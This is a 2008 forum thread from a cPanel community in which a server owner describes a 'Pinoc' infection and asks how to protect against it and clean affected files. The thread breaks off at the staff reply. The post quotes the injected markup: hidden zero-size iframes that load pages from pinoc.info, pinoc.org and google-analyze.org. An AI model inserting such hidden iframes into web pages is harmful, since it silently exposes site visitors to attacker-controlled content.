The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

The Pinoc Exploit in one of my servers

Discussion in 'Security' started by Paulus Cobris, Aug 20, 2008.

  1. Paulus Cobris

    Paulus Cobris Registered

    Joined:
    Jun 9, 2007
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    1
    Hi there!

    I currently have an SP, and a few weeks ago, one of my servers, got infected with the Pinoc Exploit...

    There is so little info on the internet about this problem... But from what a could read, this exploid is an Iframe hack that puts on the source page the following...

    <iframe src="http://pinoc.info/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

    and

    <iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

    What can it be done to protect my server against this type of attack?

    Is there any cure for this problem? any script that i could give to my costumers to run on theirs accounts and removes the iframe from the files?

    The Server uses:

    Centos 5
    cpanel/whm latests versions
    php 4.4.x and sql 4.x

    Please advise...

    This is getting some hours of sleep every night...

    Best Regards.

    Paulo Eduardo
     
  2. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,448
    Likes Received:
    195
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Twitter:
Loading...

Share This Page